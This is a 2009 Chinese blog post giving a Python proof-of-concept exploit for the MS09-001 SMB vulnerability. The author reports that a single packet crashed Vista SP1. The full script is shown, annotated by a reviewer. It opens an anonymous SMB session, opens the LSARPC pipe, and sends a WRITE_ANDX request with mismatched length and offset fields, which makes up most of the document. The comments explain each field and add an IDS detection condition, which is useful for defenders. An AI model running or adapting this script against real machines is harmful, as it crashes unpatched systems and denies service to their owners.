MS09-001 SMB DoS PoC Exploit
来源:http://hi.baidu.com/vessial/blog 作者:vessial 发布时间:2009-02-02
今天用 Python 写了一个 SMB DoS 的 PoC,在 Vista SP1 上测试,
一个包过去立刻蓝屏,不过在 XP SP2 上还有点问题。
# MS09-001 SMB DoS Vulnerabilities PoC Exploit
# Author : vessial
# http://hi.baidu.com/vessial
# Todo:
# [+] test vista sp1, system BSOD
# Reference : http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx
#             http://www.milw0rm.com/exploits/6463
#
# Reviewer summary: a flat script that opens an SMB session to one hard-coded
# host, opens a named pipe with NT_CREATE_ANDX, then sends a single WRITE_ANDX
# request whose declared data length/offset do not match the bytes actually
# sent. The referenced bulletin (MS09-001) is the vendor fix for the issue.
# NOTE(review): written against the 2009-era impacket `smb`/`nmb` modules and
# uses str literals as raw bytes, so it presumably targets Python 2 - confirm.
import impacket
from impacket import smb
from impacket import nmb

# `remote` is created here but never referenced again in this script.
remote = smb.SMBPacket('')

# Session setup against a fixed private (RFC 1918) address on TCP/445.
r = smb.SMB('*SMBSERVER','192.168.40.129',None,nmb.TYPE_SERVER,445)
# Empty user name and password: the script depends on the server accepting
# this login. NOTE(review): presumably an anonymous (null) session - a host
# that refuses anonymous access to IPC$ would stop the script at this point;
# confirm against the target configuration.
r._login('','','','WORKGROUP')
tid = r.tree_connect_andx('\\\\192.168.40.129\\IPC$')

# First request: NT_CREATE_ANDX on the IPC$ tree to obtain a file id (Fid).
smb1 = smb.NewSMBPacket()
smb1['Flags1'] = 0x18
smb1['Flags2'] = 0xc807
smb1['Tid'] = tid

ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()
ntCreate['Data'] = smb.SMBNtCreateAndX_Data()
# 14 matches the seven characters of "\LSARPC" at two bytes each.
ntCreate['Parameters']['FileNameLength'] = 14
# No second command is chained onto this packet, so 0xdede does not point at
# a real AndX block - it looks like a filler value.
ntCreate['Parameters']['AndXOffset'] = 0xdede
ntCreate['Parameters']['CreateFlags'] = 0x16
ntCreate['Parameters']['AccessMask'] = 0x2019f
ntCreate['Parameters']['CreateOptions'] = 0x400040
ntCreate['Parameters']['ShareAccess'] = 7
ntCreate['Parameters']['Impersonation'] = 2
ntCreate['Parameters']['Disposition'] = 1

# Overwrites the Data structure assigned above with a raw string: one leading
# NUL, then "\LSARPC" with a NUL between characters, then a two-byte
# terminator. NOTE(review): presumably the lsarpc named pipe - confirm.
ntCreate['Data'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"
smb1.addCommand(ntCreate)
r.sendSMB(smb1)

recv=r.recvSMB()
# `fid` is bound only when the server returns a valid NT_CREATE_ANDX answer;
# on any other response the later use of `fid` raises NameError.
if recv.isValidAnswer(smb.SMB.SMB_COM_NT_CREATE_ANDX):
    ntCreateResponse = smb.SMBCommand(recv['Data'][0])
    ntCreateParameters =smb.SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters'])
    fid = ntCreateParameters['Fid']

# Second request: WRITE_ANDX on the Fid returned above.
smb1 = smb.NewSMBPacket()
smb1['Flags1'] = 0x18
smb1['Flags2'] = 0
smb1['Tid'] = tid
data = "A"*72

writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)

# The command is attached to the packet before its fields are filled in.
# NOTE(review): this only works if addCommand keeps a reference to the
# command object rather than serialising it immediately - confirm in impacket.
smb1.addCommand(writeAndX)

writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters()
writeAndX['Parameters']['Fid'] = fid
writeAndX['Parameters']['AndXOffset'] = 0xdede
writeAndX['Parameters']['Offset'] = 0
writeAndX['Parameters']['WriteMode'] = 8
# Remaining reflects the real payload size (72 bytes) ...
writeAndX['Parameters']['Remaining'] = len(data)
writeAndX['Parameters']['_reserved'] = -1
# ... while DataLength and DataOffset are both set to 0xffff, far beyond the
# 72 bytes actually carried. This length/offset mismatch is the malformed part
# of the request. Detection note: a WRITE_ANDX whose DataOffset + DataLength
# exceeds the size of the enclosing SMB message is anomalous on its own and is
# a stable condition for an IDS/IPS rule or a protocol-parser sanity check.
writeAndX['Parameters']['DataLength'] = 0xffff
writeAndX['Parameters']['DataOffset'] = 0xffff
writeAndX['Parameters']['HighOffset'] = 0xcccccccc
writeAndX['Data'] = data
# The script sends the request and exits without reading a response.
r.sendSMB(smb1)